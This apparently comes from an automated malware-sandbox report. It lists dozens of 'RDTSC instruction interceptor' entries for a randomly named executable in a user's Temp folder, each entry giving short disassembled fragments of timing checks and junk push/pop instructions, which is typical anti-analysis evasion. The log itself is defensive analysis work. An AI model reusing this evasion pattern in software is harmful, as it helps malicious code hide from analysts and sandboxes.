Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 88D51D second address: 88D521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 88D521 second address: 88D527 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 88D527 second address: 88D553 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD81D0C8432h 0x00000009 jmp 00007FD81D0C8436h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 88C3F7 second address: 88C40B instructions: 0x00000000 rdtsc 0x00000002 js 00007FD81C88825Ch 0x00000008 jc 00007FD81C888256h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 88C40B second address: 88C418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jc 00007FD81D0C8432h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 88C5BC second address: 88C5DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push esi 0x0000000b pop esi 0x0000000c jnl 00007FD81C888256h 0x00000012 popad 0x00000013 pushad 0x00000014 jns 00007FD81C888256h 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 88C8BD second address: 88C8C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 88C8C1 second address: 88C8E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jbe 00007FD81C888256h 0x00000011 jmp 00007FD81C888266h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 88C8E9 second address: 88C8EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 88C8EF second address: 88C8FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 88C8FB second address: 88C8FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 88CCD9 second address: 88CCF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD81C888263h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 88CE60 second address: 88CE64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 88CE64 second address: 88CE87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FD81C888256h 0x0000000e jmp 00007FD81C888265h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 88D269 second address: 88D26E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 88D26E second address: 88D275 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 88FDAE second address: 88FDBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD81D0C842Dh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 88FDBF second address: 88FDC9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD81C888256h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 893B27 second address: 893B42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD81D0C8433h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 893C66 second address: 893CA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FD81C888268h 0x0000000b jmp 00007FD81C888268h 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 897F7D second address: 897F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FD81D0C8426h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 897F89 second address: 897F8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 897F8E second address: 897FAD instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD81D0C8432h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jc 00007FD81D0C842Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 897FAD second address: 897FB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 897FB9 second address: 897FCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C8432h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 898295 second address: 89829B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 89871C second address: 898721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 898721 second address: 898741 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FD81C888265h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 898741 second address: 898747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 898747 second address: 898765 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD81C888260h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FD81C88825Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 89CD95 second address: 89CDE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C8435h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FD81D0C8439h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 jmp 00007FD81D0C8431h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 89CDE0 second address: 89CDF2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD81C88825Ah 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 89CDF2 second address: 89CDF8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 89CF4F second address: 89CF67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD81C888263h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 89CF67 second address: 89CF6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 89CF6D second address: 89CF71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 84E263 second address: 84E2AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jmp 00007FD81D0C8431h 0x0000000c popad 0x0000000d nop 0x0000000e call 00007FD81D0C842Eh 0x00000013 mov dword ptr [ebp+1245431Bh], edi 0x00000019 pop edi 0x0000001a mov ebx, dword ptr [ebp+1248E20Bh] 0x00000020 movzx ecx, di 0x00000023 add eax, ebx 0x00000025 cld 0x00000026 or edi, 0FC72802h 0x0000002c push eax 0x0000002d push esi 0x0000002e push eax 0x0000002f push edx 0x00000030 push esi 0x00000031 pop esi 0x00000032 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 84E2AA second address: 84E2AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 89D7B5 second address: 89D7DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD81D0C842Bh 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD81D0C842Fh 0x00000011 jnp 00007FD81D0C8426h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 89E277 second address: 89E27C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 808A94 second address: 808A9E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD81D0C8426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 8A1BEB second address: 8A1BEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 8A1BEF second address: 8A1C06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD81D0C8426h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jnl 00007FD81D0C8426h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 8A1E9B second address: 8A1EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 8A7701 second address: 8A7713 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FD81D0C842Ch 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 8A7860 second address: 8A7875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop eax 0x0000000d pop esi 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 8A7875 second address: 8A7879 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 8A7B14 second address: 8A7B1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 8A7B1A second address: 8A7B22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 8A7B22 second address: 8A7B60 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD81C888256h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FD81C888261h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 je 00007FD81C88826Dh 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 8A7B60 second address: 8A7B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnl 00007FD81D0C8426h 0x0000000c popad 0x0000000d jno 00007FD81D0C842Ah 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 8A8134 second address: 8A813A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 8A813A second address: 8A8140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 8A8CDF second address: 8A8CE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 8A9324 second address: 8A932A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 8A932A second address: 8A9330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 8ADEC2 second address: 8ADEC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 8AD096 second address: 8AD0A0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD81C888256h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 8AD0A0 second address: 8AD0AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 8AD0AD second address: 8AD0B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 8AD0B1 second address: 8AD0B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 8AD0B9 second address: 8AD0D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FD81C888264h 0x0000000b rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8AD3D9 second address: 8AD3DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8AD671 second address: 8AD675 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8AD7DE second address: 8AD7E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FD81D0C8426h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8ADBD2 second address: 8ADBEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FD81C888256h 0x0000000a popad 0x0000000b pushad 0x0000000c jl 00007FD81C888256h 0x00000012 jo 00007FD81C888256h 0x00000018 popad 0x00000019 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8ADBEB second address: 8ADBF0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8B2694 second address: 8B269A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8B269A second address: 8B26A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8BB889 second address: 8BB88D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8BB88D second address: 8BB896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8BB896 second address: 8BB8A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD81C88825Ch 0x0000000c rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8BB8A9 second address: 8BB8AF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8BA1CA second address: 8BA1D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8BA1D2 second address: 8BA1D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8BA1D9 second address: 8BA1DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8BA1DF second address: 8BA1E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8BA3B5 second address: 8BA3D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C888268h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8BA64B second address: 8BA651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8BAF73 second address: 8BAFA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FD81C888256h 0x0000000a jc 00007FD81C888256h 0x00000010 jmp 00007FD81C888268h 0x00000015 popad 0x00000016 pushad 0x00000017 push esi 0x00000018 pop esi 0x00000019 push edi 0x0000001a pop edi 0x0000001b popad 0x0000001c rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8C132A second address: 8C1332 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8C1054 second address: 8C105A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
